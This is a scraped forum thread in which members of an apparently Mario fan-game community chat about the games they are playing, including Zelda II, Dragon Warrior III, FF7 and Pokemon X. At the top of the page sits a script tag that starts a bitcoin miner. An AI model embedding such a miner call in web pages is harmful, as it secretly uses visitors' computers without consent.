<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitysmw central

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Mata Hari

Re: What games are you playing?

Postby Mata Hari » 6 years ago

I wish they had made the holes visible if you'd turned the camera. The point of being able to turn the camera is to make otherwise hidden things visible; if you think to turn the camera and don't see anything there, you would be even less likely to think there was anything there at all.

pholtos
Loves adorable things.

Postby pholtos » 6 years ago

LIMBO was a pretty neat puzzle game, on to a combo of three snes games. Also recently finished assassin's creed brotherhood but still have to 100% sync.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 6 years ago

Just played through Kirby and the Amazing Mirror over the past few days. It was pretty great.
twitter (spicy at times!) | avatar by kuma

who cares:

PekoTAS

Postby PekoTAS » 6 years ago

Over the span of two days I played and beat Zelda II: The Adventure of Link for the first time. It's a shame it has a bad reputation, because it was a ton of fun. Much like Kid Icarus it's mostly just really difficult early on when you don't have any upgrades. Well, at least until you get to the Great Palace. >_>

I only needed to check gamefaqs once, which kind of annoys me since what I missed was pretty obvious. I didn't know about the secret town where you get the final magic container/magic key/Thunder Spell, so I got all the way to the Thunderbird without the thunder spell, and had to leave and come back. I would have found it too had I known I could destroy trees with the hammer, because I thought it was strange that there was a whole little island with nothing there.

I'm not sure how much fun it will be on a second playthrough, but certainly my first time through it had the same excitement of discovery that other Zelda games have. Upgrading felt fantastic as every attack upgrade and heart container really made you feel twice as strong every time you got one.

Aside from the Great Palace being a bit too hard, and the game's shaky beginning, I'd totally recommend Zelda II. Though I'd also recommend looking up scans of the original manual and reading it before you play. I actually have the original manual, and the much more detailed story given in the manual adds a lot. Plus there are a lot of useful pointers in the other pages that are good to know. Too bad I didn't read it carefully enough since it says right in the manual that you can cut down trees with the hammer. :/

skyluigi2

Postby skyluigi2 » 6 years ago

Hmm, I've never really taken the time to play through Zelda II. I'm pretty sure I have it somewhere on my 3DS, so maybe I should have a go at getting through it at some point.

PichuVSLink

Postby PichuVSLink » 6 years ago

Bullet Audessy is FREAKIN' hard.

Mostly just the last 3 stages though.

Those are the only ones I didn't perfect.

totally not a showoff what are you talking about
patchoulis obtained

"graphics: 9/10, come on, it's CUSTOM!" -smwc hack review

pholtos
Loves adorable things.

I had an urge to play a standard turn based RPG (I put down super r-type for a while, pretty dang hard) so I fortune cookied til I got one. Dragon Warrior III is actually a game I had as a kid but didn't get very far in. Been playing it for a bit but raged a bit at a random encounter consisting of 1 not so annoying enemy and four enemies which all have the ability to put my entire party to sleep. So at a point they kept putting anyone to sleep that woke up and attacked the remaining times, thus killing all four of my members with no chance to fight back. It was... quite the sight to see.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

QuantumPhysicsMan

Postby QuantumPhysicsMan » 6 years ago

I finished the Bravely Default demo recently, and it looks like it'll be a good game. The whole brave/default concept is neat, but I found having a performer boost everyone's attack and then stabbing bosses until they died to be more effective.
Warning: It is now too late to not read my signature.

skyluigi2

QuantumPhysicsMan wrote:I finished the Bravely Default demo recently, and it looks like it'll be a good game. The whole brave/default concept is neat, but I found having a performer boost everyone's attack and then stabbing bosses until they died to be more effective.
Bravely Default is such a great game. I never bothered with the demo but apparently there are specific quests that you can do only in the demo... or something?

PichuVSLink

Postby PichuVSLink » 6 years ago

I just completely perfected Bullet Audessy! Man, it feels good.

Welp, back to Luigi's Mansion: Dark Moon.
patchoulis obtained

"graphics: 9/10, come on, it's CUSTOM!" -smwc hack review

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 6 years ago

pokemonnnnnnnnnnnnnnnnnnnn

Having received Pokemon X for Christmas (along with others, but it has my focus), I've been playing that here and there, but not as much as I would like to due to RL stuff. It's so much more polished than past games and it's pretty great!!! If anything, my issue with it is having too MANY options available and having to try to choose just a few guys at a time :v (though rotating every so often is way more possible due to the much-improved Exp gaining)

Also been playing some New Mario Bros U recently (also we got a Wii U for Christmas), and I'm legitimately enjoying it overall, though swimming levels are pretty much 100% terrible.
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

skyluigi2

swirlybomb wrote:Also been playing some New Mario Bros U recently (also we got a Wii U for Christmas), and I'm legitimately enjoying it overall, though swimming levels are pretty much 100% terrible.
Ah, if you like that you should definitely consider New Super Luigi U... it's much more difficult but also really awesome.

Bwarch
Local Candy Fiend
Pronouns: He/Him/His

Postby Bwarch » 6 years ago

Personally I'm put off by Luigi U, just watching Runaway Guys play it though.

It seems just too much more of the same. The hidden Luigi easter egg hunt is kind of a cool idea, and yes a little bit more difficult, but certainly not worth buying another game for.

Especially when they reused a whole ton of things for this, same graphics, same enemies, even the same map. With the physical edition for Luigi U costing 30$, I'd splurge a little bit more and just go for SM 3D World.

swirlybomb
a bomb that is swirly

We got a deluxe set thingy that came with both Mario Bros U and Luigi U, so yeah, I have that too.

Somehow played through three worlds of it with a cousin when they were visiting for the holidays, and hoo boy is it ever challenging!
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

BeatBoxingBoo

Postby BeatBoxingBoo » 6 years ago

I'm trying (again) to 100% Yoshi's Island. I almost burst into tears of joy when I completed the poochy level in world 1.

If this Kickstarter has taught me anything, it's that there are a lot of different kinds of potato salad.

To connect: minehaus.mcph.co

hi! I am a 18 year old ■■■■ who loves being ■ ■■■■■ ■■■■■ and taking ■■■■■■■ ■■■■■■■■!I really shouldn’t hate people for not being funny and trying to be funny.

But I hate people for not being funny and trying to be funny.

Bean

Postby Bean » 6 years ago

Have fun with Kamek's Revenge. That was always the hardest level to me to do a 100% run on in that game.

With all the NES stuff I've been doing, I've kind of just fizzled out on Dragon Ball: Origins for a bit. I'm hoping I give myself some time to play that again soon since I was making good progress the last time I played.

zmonbobbo
Haustone Tournament Semifinalist
Hey there! I'm a dude!
First name: Zach
Pronouns: he/him/his

Postby zmonbobbo » 6 years ago

I've been on a Dr. Mario kick lately. I've also been playing a few indie games I picked up during the Steam sale, but none of them are really sticking out yet.
I'm probably driving right now.

BeatBoxingBoo

Postby BeatBoxingBoo » 6 years ago

Yep. My shitty SD Card adapter definitely deleted my Yoshi's Island save file.

Guess I'm not 100%ing it for some more months or years!!

If this Kickstarter has taught me anything, it's that there are a lot of different kinds of potato salad.

To connect: minehaus.mcph.co

hi! I am a 18 year old ■■■■ who loves being ■ ■■■■■ ■■■■■ and taking ■■■■■■■ ■■■■■■■■!I really shouldn’t hate people for not being funny and trying to be funny.

But I hate people for not being funny and trying to be funny.

pholtos
Loves adorable things.

Really enjoying dragon warrior iii to this point. I guess as a younger man I never really enjoyed the older style rpg that much.

Meanwhile I may end up playing final fantasy 7 someday, although I can't get by the fact that THEY LOOK LIKE LEGO PEOPLE. Anyone have a strategy to ignore this fact? It's way too easy to see that.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

Currently playing:

swirlybomb
a bomb that is swirly

Watch out for those pointy bits!

I don't know about other people, but it's easy enough for me to say "eh it was made a long time ago" and then not think about it anymore. So I probably can't help you :v
BeatBoxingBoo wrote:Yep. My shitty SD Card adapter definitely deleted my Yoshi's Island save file.

Guess I'm not 100%ing it for some more months or years!!
I believe in you, you can do it.

hahahageez getting so used to having New Mario Bros' midair spin ability makes trying to play SMBX hilariously awkward when I keep forgetting that I obviously don't have it.

ultratowel112

Postby ultratowel112 » 6 years ago

I've been playing MMX and trying to get speedrunning tricks down, but I realized today that I should probably work on being able to beat Boomer Kuwanger buster-only before focusing on iceless and waterless... I also experimented with a different control scheme (R for dash and A for weapon swap right so that it is easier to charge+dash+jump), but it's really hard to break a >15 year habit so I gave up on that. Tip+right of knuckle+center/left of knuckle gets a little irritating after a while, but it's a pretty smooth motion (for me at least).

Also Pokemon and Find Mii/Puzzle Swap, but those are kind of constants. My main complaint about the latter two is that you can only earn 10 Play Coins a day. If I can take at least 10000 steps a day, I should be rewarded (besides, you know, being healthy and all that stuff. These steps don't do anything for me because I have to do them to get to/from class and I'm used to it).
Posting and you, everything you should know before posting
TLs4 wrote:I WILL finish MATH2 - there will be WINNERS, there WILL be prizes, and I WILL be returning to LPing; sooner than later at that but tat is NOT the point of this discussion.

Bwarch
Local Candy Fiend

swirlybomb wrote:

hahahageez getting so used to having New Mario Bros' midair spin ability makes trying to play SMBX hilariously awkward when I keep forgetting that I obviously don't have it.
I went from NSMB U into SM 3D World and I kept on messing up the flag poles horrendously because I kept on trying to spin :(

swirlybomb
a bomb that is swirly

Cat Suit, yo

Bwarch
Local Candy Fiend

Of course, but I kept on losing it because perspective.

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 6 years ago

Hey guys I was playing Zelda II over the past few days
I beat it

It was pretty good

Yes
Pholtos wrote:Meanwhile I may end up playing final fantasy 7 someday, although I can't get by the fact that THEY LOOK LIKE LEGO PEOPLE. Anyone have a strategy to ignore this fact? It's way too easy to see that.
Oh hey I'm playing FF7 too
We have so much in common

I'm right before the boss battle with
Dyne
at the Corel Prison.
I actually beat him and got the buggy, but I forgot to save because I'm a moron.

My fave chars so far are Barret, Yuffie and Red XIII. Tifa is pretty cool too.

Yuffie has the cutest theme song goddamn

I want to play DQ3 (also Ys III but), but I'm already playing FF7, SaGa 3, and I've been ignoring KH1 for the past few weeks and I'd rather finish up one of those before starting up another one.

P.S. I kinda want to play some WRPGs too, but I don't know where to start.
♥Ruby Weapon x Cloud OTP♥
swirlybomb wrote:I don't know about other people, but it's easy enough for me to say "eh it was made a long time ago" and then not think about it anymore. So I probably can't help you :v
The pre-rendered backgrounds are pretty great though.

I think the Lego people are supposed to replicate the chibi sprites in FF1-6 (battle sprites in 1-5, OW and battle in VI).

Honestly, I don't care about graphics. Just gameplay.
twitter (spicy at times!) | avatar by kuma

who cares:

Return to “the cartridgé”